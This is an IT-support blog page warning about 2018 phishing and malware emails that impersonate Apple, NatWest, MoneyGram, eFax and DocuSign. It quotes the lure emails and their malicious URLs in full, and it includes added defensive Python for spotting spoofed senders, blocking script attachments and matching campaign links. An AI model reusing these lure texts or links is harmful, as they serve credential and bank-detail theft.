sircles.net Computer Support The sircles IT support & solutions blog | SPAM

The sircles IT support & solutions blog Internet Safety & Security, Windows Tweaks and Server Fixes

Your Email Domain Account Notification!! Spam

11. October 2018 16:45 by sirclesadmin in Viruses and Malware threats, SPAM, Phishing

 

This email has been doing the rounds today:

 

 

From:                              YourEmailDomain.com [no-reply@mailserver.com]

Sent:                               11 October 2018 02:01

To:                                   Recipient

Subject:                          YourEmailDomain.com Account Notification!!

 

Email Security info

Your email name@domain.com has reached an upgrade stage, verify your user email to continue usage,

This is for your own safety to continue using your account, click the button below.

 

Verify

 

Note: Please do not ignore this email to avoid your account closure
Thanks,
The security email team.

.

 

Copyright © 2018 Mail! Inc. (Co. Reg. No. 2344507D) All Rights Reserved. Intellectual Property

 The 'verify' link actually points to: https://caravanecafe.ca/mikoko/Qupdate/index.php?email=name@domain.com&browser=unkonown&time=valid which has already been marked as deceptive by the big browsers:

The website itself:

Is fairly convincing looking and I will type them a nice message in the password field commending them on their good work and encouraging them to continue.

The password field actually appears to do a lookup of some kind, as it reports that the password is wrong, but perhaps they just want to get as many of your passwords as possible...?

Anyway, stay vigilant and safe!

We could not reset the password for your AppIe lD - Spam Warning

11. October 2018 16:08 by sirclesadmin in Internet Security, SPAM

 

This rather weak spam email uses a PDF to try and hide its dirty link to a fraudulent website.

The email itself:

Dear AppIe User.

We could not reset the password for your AppIe lD because there were too many failed attempts to answer your security questions.  

To read your secure message by opening the attachment(PDF).

You will be prompted to open(view)the file or save(download) it to your computer or device

For best results Save the file , then open it on a web browser.

Your account will be locked if we didn’t receive any response from you in more than twenty four hours

Sincerely,          

Apple Support  

 

Copyright © 2018 Apple Distribution International, Hollyhill Industrial Estate, Hollyhill, Cork, Ireland.

All rights reserved.

 

The Unlock Apple ID link points to:

http://applie-id.veriby.coolambo.ca which is sketchy at best. The website itself is already marked as deceptive by Google and Microsoft and so shouldn't be making too many lives more miserable.

The Apple site impersonation is somewhat more impressive:

And after you type in any email address and password to the unsecured site, it then presents you with:

in which they actually have the audacity to ask for a card number and bank account and sort code as security.

Hopefully no one will fall for this nonsense, and they will have wasted their time.

Stay vigilant!

 

Package(3VKN_270) confirmed: 8 items sent Spam Email

4. September 2018 14:25 by sirclesadmin in Online Fraud, SPAM

 

Watch out for this email:

 

From:                                                       Bessie Daulton <maricela.schoultz@shenandoahbennett.com>

Sent:                                                         Tuesday, September 4, 2018 12:39 PM

To:                                                            Recipient

Subject:                                                   your name, Package(3VKN_270) confirmed: 8 items sent

 

 
 
 
 
 

Dear your name

We are now processsing your order 3VKN_270, please find your order details below:

 
 

Shipment Details

Name and Postcode


TOWN
County

 
 
 

Your order details here

 
 
 
 
 
 

This confirmation acts as your guarantee, which begins from the day your product is delivered to you.

 

Consumer Contracts Regulations 2013 offers the following cancellation rights

Please note that you are entitled to cancel this contract if you so wish, provided that you exercise your right no longer than 14 days after the day on which you receive the goods or services.

Please note that your right to return products does not apply to goods made to your specification, that have been clearly personalised or which by reason of their nature cannot be returned or are liable to deteriorate or expire rapidly.

If you wish to exercise your right of cancellation, you are obliged to retain possession of the goods and take reasonable care of them.

 

If you decide to cancel, you should return the goods to us at your cost within 14 days of such cancellation and we will reimburse to you (by the method used to pay for the original transaction) the amount in relation to goods to which cancellation rights apply. This includes the cost of delivery (except for the supplementary costs arising if you choose a type of delivery other than our standard and least expensive method of delivery). We may make a deduction from the reimbursement for loss in value of any goods supplied, if the loss is the result of unnecessary handling by you. We will make the reimbursement no later than 14 days after the day we receive back from you any goods supplied.

 

Returning items

We want you to be happy with your purchase. If you're not, just return the item with proof of purchase and we'll exchange or refund it.

Further information can be found in the customer service section of our website and the dispatch note included with your order. Our usual refund policy does not apply to cut or made to order products or perishable goods, which cannot be returned or exchanged unless faulty.

This does not affect your statutory rights.

Returns can be made using the following options:

 

Via our shops: please take this email with you. It shows the prices you paid at the time of your order, and so helps us process your return more quickly and accurately.

  

Further information on our Terms and Conditions can be found in the Customer Services section of our website, and on the delivery note included with your order.

 

Do you wish to track your order or require a receipt?

To track the status of your order or print a VAT receipt, if applicable, please click here. You may receive an email from us that will tell you how to track your order as soon as it has been collected for delivery.

 

Security

We will never ask you to send any personal details via email. If we require such details, for security reasons we will ask you to contact us by phone. Should you receive an email claiming to be from requesting this kind of information, please do not respond to it but do let us know.

 
 
 

Thank you for shopping with us.

Customer Services

 
 
 
 
 

Prices are subject to change without prior notification. Products subject to availability, while stocks last. Images are representative only. Errors and omissions excluded.

 

Update your details

 

Change your preferences

 
 
 
 
The actual 'Your order details here' link points to: https://assjournal.com/.cabinet/3VKN_270-package-updated which sounds like rather an odd website.
The link will download a command to upload or corrupt your personal data, so do not run the command.
The Windows shell command will be run on your own documents or downloads folder and may involve blackmail or identity theft.
Be sure to report the originators of this email as well as the website.
 

Upgrade to a more secure banking - Natwest Spam Warning !!

4. September 2018 07:18 by sirclesadmin in Online Fraud, SPAM

 

This email is a typical example of phishing for banking details:

 

 

Upgrade to a more secure banking

 

 

From:                                                       NatWest <info@solidar.es>

Sent:                                                         Saturday, September 1, 2018 12:34 PM

To:                                                            Recipient

Subject:                                                   Upgrade to a more secure banking

 

Final hours: Get 50% OFF Yearly Premium Plans with our Surprise Sale. Hurry & upgrade your website now!


Can't see this email? Click here.

#

 
 
 

Upgrade to a more secure banking

 

 

Don’t miss out - last chance to upgrade your account and get £100 instant bonus!

 

 

We are regularly changing our online banking system, we will always contact you immediately we notice any issue on your account.

To receive the £100 bonus you are required to update your online information for your security. Please continue below.

 
 

#

Stay up to date with our latest news & features

 

Please do not reply to this email
If you wish to unsubscribe click here

View our privacy policy

 

 

 

The email is quite well presented - the 'Can't see this email?' question at the top is a good example of how spammers use regulations to sidestep any suspicions we may have about the authenticity of an email.

If you click on the 'can't see this email?' link you are taken to: http://micato.co.uk/wp-admin/includes/036f707f904b5d1f9018d3085a975597/info/login.php?assets.adobedtm.com/5165c8c319825f6ec3fb78d0a8dcc1054ab35a3d/satelliteLib-08b84ffc82250dd93a29554e43774d72e7c1876b.js 

It is important to note that the site in the above link is not secure (it begins http and not https), which is an instant and certain indicator that this is not a real banking site.

The site is already labelled by Google as deceptive:

 

And Microsoft Edge:

 

The site itself looks similar to Natwest:

 

But is obviously unsecured and way too slow for a real bank.

Report the originating email and the website as fraudulent and stay vigilant.
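
The From lines quoted on this page pair a well-known brand in the display name with an unrelated sending domain (NatWest with solidar.es here), and the Apple-themed subject swaps letters for look-alikes. The check below is an added example, not part of the original post; the brand-to-domain allowlist and the `support@example.invalid` and `alerts@natwest.com` senders are assumptions made for illustration.

```python
import re

# Assumption: brand keyword -> domains that brand really sends mail from.
BRAND_DOMAINS = {
    "natwest": {"natwest.com"},
    "moneygram": {"moneygram.com"},
    "efax": {"efax.com"},
    "docusign": {"docusign.com", "docusign.net"},
    "apple": {"apple.com"},
}

# After lower-casing, fold characters that are swapped for each other
# ("AppIe" uses a capital I for the l) onto a single form.
CONFUSABLES = str.maketrans({"i": "l", "1": "l", "0": "o"})

# Display name, then the address in <...> or in Outlook's printed [...] form.
FROM_RE = re.compile(r"^(?P<name>.*?)\s*[<\[](?P<addr>[^<>\[\]\s]+@[^<>\[\]\s]+)[>\]]$")


def skeleton(text):
    """Lower-case text with look-alike characters folded together."""
    return text.lower().translate(CONFUSABLES)


def brands_in(text):
    """Map each brand named in text to True if it only matches after folding."""
    plain, folded = text.lower(), skeleton(text)
    return {b: b not in plain for b in BRAND_DOMAINS if skeleton(b) in folded}


def check_message(from_header, subject=""):
    """Return a list of findings for one message's From header and subject."""
    match = FROM_RE.match(from_header.strip())
    if not match:
        return ["From header could not be parsed"]
    domain = match.group("addr").rsplit("@", 1)[1].lower()
    findings = []
    for brand in sorted(brands_in(match.group("name"))):
        ok = any(domain == d or domain.endswith("." + d) for d in BRAND_DOMAINS[brand])
        if not ok:
            findings.append(f"display name claims {brand}, sender domain is {domain}")
    for field, text in (("display name", match.group("name")), ("subject", subject)):
        for brand, lookalike in sorted(brands_in(text).items()):
            if lookalike:
                findings.append(f"{field} spells {brand} with look-alike characters")
    return findings


# From lines and subjects as quoted on this page, except where marked constructed.
SAMPLES = [
    ("NatWest <info@solidar.es>", "Upgrade to a more secure banking"),
    ("MoneyGram Payment Systems, Inc <moneygram@teamusacargo.com>",
     "Payment Message From MoneyGram Systems, Inc"),
    ("DocuSign Signature  Service <docusign@pehache.com>",
     "You received notification from DocuSign Signature Service"),
    # Constructed sender: the page does not show the Apple email's From line.
    ("Apple Support <support@example.invalid>",
     "We could not reset the password for your AppIe lD"),
    ("NatWest <alerts@natwest.com>", "Your statement is ready"),  # constructed, clean
]

if __name__ == "__main__":
    for sender, subject in SAMPLES:
        print(sender, "->", check_message(sender, subject) or "no findings")
```
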

 

Spam Warning: Payment Message From MoneyGram Systems, Inc

23. August 2018 16:51 by sirclesadmin in Online Fraud, SPAM

 

This email has been spotted:

 

From:                                                       MoneyGram Payment Systems, Inc <moneygram@teamusacargo.com>

Sent:                                                         Thursday, August 23, 2018 4:51 PM

To:                                                            Recipient

Subject:                                                   Payment Message From MoneyGram Systems, Inc

 

 

 

 

 

 

 

Welcome to MoneyGram!

 

Here is your new transaction from MoneyGram.

 

 

In case you don't have with MoneyGram, click on the link provided below to easily open an account with us and cash out to your banking account .

 

 

We look forward to helping to make your future money transfer simple and enjoyable send now!

 

View your transaction details

 



 

  

 

  

 

  

Download our App:

App store logo


Don't respond to this e mail. In case you have further questions, please call us.

 

Customer Protection | Privacy Policy

MoneyGram Payment Systems, Inc. | 2493 Utica Road E, Stu 100 | Minneapolis, MN 53712

 

This message may consist of confidential info. Don't give any information concerning this financial transaction to a third party. If you are not the intended receiver, inform us promptly and erase this e mail from your system.

 

2018 MoneyGram Payment Systems. All rights reserved.

 

Facebook  Twitter  Youtube

  

 

  

 

The link actually points to: http://furnitureforthehometv.com?3le150=QAUSY1CQVUFS1QXOBsGSJTHS with no certificate or security.

The link simply downloads a harmful .DOC file named invoice.doc to your computer - DO NOT OPEN THIS FILE.

Make sure you report the email address moneygram@teamusacargo.com as dangerous; the website http://furnitureforthehometv.com seems to have been deactivated already.

Spam Warning: Your Name, Pack(50RM_84248) confirmed: 7 items sent

9. August 2018 07:19 by sirclesadmin in Internet Security, Online Fraud, SPAM

 

This email has been assembled by sourcing information from your personal history online. In this example they have sourced an old telephone number from somewhere, probably sold to them by our local council.

 

From:                                                       Direct <theo-letran@glampiny.com>

Sent:                                                         Thursday, August 9, 2018 6:35 AM

To:                                                            Recipient

Subject:                                                   Your Name, Pack(50RM_84248) confirmed: 7 items sent

 

 

Order Acknowledgment

Dear Your name,

Your order is now confirmed. Thanks for shopping with us!

 

Billing Address:
Your Name 
Your Telephone Number Postcode 




Your Order Reference: 50RM_84248
Order Date: 8/9/2018

Delivery Address:
Your Name
Your Telephone Number Postcode

Your Order 50RM_84248 available here

Your right to cancel:

In addition to the EU and UK Distance Selling Regulations, we offer you 30 days to change your mind on any purchase.

To cancel the order, please complete the enclosed returns slip and return the item(s) to us at the address that is on the returns slip.

We recommend that you use a recorded delivery service.

Please note that you are responsible for the costs of returning the items to us unless the goods delivered are incorrect or faulty. In this case, you will be credited for the cost of your return up to a reasonable amount.

As soon as we receive your item(s) the returns procedure will be initiated and refunds will be processed.

 
 
The hyperlink 'Your Order 50RM_84248 available here' actually links to: https://kocobanana.com/.orderdetails/50RM_84248-confirmation which is presumably a genuine website as it has a certificate but it simply forwards you to: https://support.office.com/office-training-center?wt.mc_id=AID573689_QSG_184686 which is presumably not an association that Microsoft enjoy. 
The actual link downloads a zip file:
 
The contents of the zip file are as follows:
 
 
And when extracted, reveal:
 
 
The image just being a Google Pay image:
 
 
And the shortcut linking to:
 
 
As we can see, this is another Windows PowerShell command, but one which we cannot make head or tail of - fildunare is not a term which any of us recognise, so any light anyone can shed would be most welcome.
Either way, it is attempting to find the string fildunare with a .lnk extension in your documents and invokes desktop.ps1, which doesn't actually seem to be included with any version of Windows and so is a bit of a mystery.
 
Either way, make sure that .ps1 files are blocked inside of attachments, especially archive files, and this will not be an issue.
The originating email domain - glampiny.com - does not seem to be a website either so block that domain from your email server.
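
One way to apply the advice above at a mail gateway: open zip attachments and refuse them when any member, including one inside a nested zip, is a script or shortcut. This is an added example, not code from the original post; the extensions beyond `.ps1` and `.lnk`, the depth and size limits, and the constructed sample member names are assumptions.

```python
import io
import zipfile

# .ps1 and .lnk come from the post; the other extensions are assumptions
# about what a gateway policy would also refuse inside an archive.
BLOCKED = {".ps1", ".lnk", ".js", ".vbs", ".bat", ".cmd", ".scr", ".exe"}
MAX_DEPTH = 3                    # nested archives deeper than this are refused
MAX_MEMBER_BYTES = 20 * 1024**2  # declared size above which a nested zip is not unpacked


def extension(name):
    """Final extension, lower-cased, ignoring trailing dots and spaces."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1].rstrip(". ").lower()
    return base[base.rfind("."):] if "." in base else ""


def scan_zip(data, depth=1, prefix=""):
    """Return (member path, reason) pairs that should get the attachment blocked."""
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return [(prefix or "<attachment>", "not a readable zip")]
    findings = []
    with archive:
        for info in archive.infolist():
            if info.is_dir():
                continue
            path = prefix + info.filename
            ext = extension(info.filename)
            if ext in BLOCKED:
                findings.append((path, "blocked extension " + ext))
            elif info.flag_bits & 0x1:
                findings.append((path, "encrypted member, cannot inspect"))
            elif ext == ".zip":
                if depth >= MAX_DEPTH:
                    findings.append((path, "archive nested too deeply"))
                elif info.file_size > MAX_MEMBER_BYTES:
                    findings.append((path, "nested archive too large to unpack"))
                else:
                    findings += scan_zip(archive.read(info), depth + 1, path + "!")
    return findings


def build_sample():
    """Constructed attachment: an image, a shortcut and a nested zip with a script."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as zf:
        zf.writestr("desktop.ps1", b"# constructed placeholder, not real content\n")
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as zf:
        zf.writestr("order/picture.png", b"constructed placeholder")
        zf.writestr("order/order.pdf.lnk", b"constructed placeholder")
        zf.writestr("order/extra.zip", inner.getvalue())
    return outer.getvalue()


if __name__ == "__main__":
    for path, reason in scan_zip(build_sample()):
        print(path, "->", reason)
```
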

Spam Warning: You've received efax Notice

8. August 2018 07:58 by sirclesadmin in Internet Security, SPAM

 

We have seen this email throughout this week:

 

 

 

 

From:                                                       eFax j2 Global <efax@ramatmed.com>

Sent:                                                         Tuesday, August 7, 2018 7:52 PM

To:                                                            Recipient

Subject:                                                   You've received efax Notice

 

 

 

 

eFax_Faxing_Simplified

 

Fax Message; ID: 4734 745 7735,

You have got a 6 page(s) fax at 08-07-2018 08:34:55 GMT.

*Your reference number is ek4_pid02-88444959724931-3463741-40.

Visit www.efax.com/efax-help-center if you have any questions relating to this notification.



The eFax Team

 

j2 footer
2002-2018 j2 Global, Inc. and affiliates. All rights reserved.
eFax is a trademark of j2 Global, Inc.
22592 Hollywood Blvd, Los Angeles, CA 98613

*** This is an automatic message, please do not reply directly to this email address *** Privacy Policy.

The 'Get Fax Now' link actually points to: http://hvcrmls.info?82a6yp=QIUBNYQASHUBQYUDP which appears to have already been removed, but the site name is so bizarre, it makes you wonder if it ever existed. I am not going to invest time in looking it up but this email is spam and should be reported.
The sender efax@ramatmed.com has a domain of what appears to be a Los Angeles medical supplier but the website is very spartan.
 

Spam Warning: You received notification from DocuSign Signature Service

7. August 2018 06:48 by sirclesadmin in Internet Security, Fraud, Online Fraud, SPAM

 

You may see the following email, purportedly from DocuSign. We have seen it being captured by most spam guards but also getting through many on other occasions.

 

 

 

 

From:                                                       DocuSign Signature  Service <docusign@pehache.com>

Sent:                                                        Monday, August 6, 2018 5:21 PM

To:                                                           Recipient

Subject:                                                   You received notification from DocuSign Signature Service

 

 

 

 

 

 

DocuSign

Review and sign this document.

 

Dear Receiver,

Please review this invoice
It is an automatically generated invoice.

 

This email contains a secure information. Do not share this code with other people.

Additional Signing Way
Please visit DocuSign.com, click on 'Access Documents', and enter the security code: F80B75BEF7

About Our Service
Sign invoice electronically in just minutes. It's risk-free. Whether you're at work, home or even across the globe -- Our service gives a professional solution for Digital Transaction Management.

Have questions about an Invoice?
In case you need to modify the document or have questions about the details in the document, reach out to the sender directly.

If you are having trouble signing the document, please see the Help with Signing page on our Webpage .
 

Review Invoice

This message was sent to you by DocuSign Electronic Signature Service.

 

 

The 'view invoice' link actually points at: http://keithharenda.com?6d50=QAUSY1CQVUFS1QXOBsGSJTHS which is an unsecured site which appears to have been compromised.
The folder appears to have already been removed.
We have also seen: http://nashvillechildfamilywellness.com?20Yy5=QAUSY1CQVUFS1QXOBsGSJTHS being used by the same email.
The 'review invoice' link at the bottom points to: http://kphbuilds.com?7P62A=QAUSY1CQVUFS1QXOBsGSJTHS which also appears to have been shut down.

Report any senders of this email; the pehache.com domain does not seem to function either.
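
The links in this post use different hosts and parameter names but carry the same query value, which also appears in the MoneyGram link quoted earlier on this page, so a filter keyed on the value catches hosts that a domain blocklist has not seen yet. The following is an added example, not part of the original post; the minimum token length and the `unseen-host.example` URL in the usage are assumptions.

```python
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Links quoted in the posts on this page.
LINKS = [
    "http://keithharenda.com?6d50=QAUSY1CQVUFS1QXOBsGSJTHS",
    "http://kphbuilds.com?7P62A=QAUSY1CQVUFS1QXOBsGSJTHS",
    "http://furnitureforthehometv.com?3le150=QAUSY1CQVUFS1QXOBsGSJTHS",
    "http://hvcrmls.info?82a6yp=QIUBNYQASHUBQYUDP",
]

MIN_TOKEN_LEN = 12  # assumption: shorter values are too common to pivot on


def query_values(url):
    """Return (host, [values]) for a link, ignoring the parameter names."""
    parts = urlsplit(url.strip())
    values = [value for _, value in parse_qsl(parts.query)]
    return (parts.hostname or "").lower(), values


def shared_tokens(urls, min_hosts=2):
    """Map each long query value to the hosts using it, if seen on several hosts."""
    hosts_by_token = defaultdict(set)
    for url in urls:
        host, values = query_values(url)
        for value in values:
            if host and len(value) >= MIN_TOKEN_LEN:
                hosts_by_token[value].add(host)
    return {t: sorted(h) for t, h in hosts_by_token.items() if len(h) >= min_hosts}


def matches_campaign(url, tokens):
    """True if a link, whatever its host, reuses a known campaign token."""
    _, values = query_values(url)
    return any(value in tokens for value in values)


if __name__ == "__main__":
    tokens = shared_tokens(LINKS)
    for token, hosts in tokens.items():
        print(token, "seen on", ", ".join(hosts))
    # Constructed URL on a host that is on no blocklist yet.
    print(matches_campaign("http://unseen-host.example?zz9=QAUSY1CQVUFS1QXOBsGSJTHS", tokens))
```
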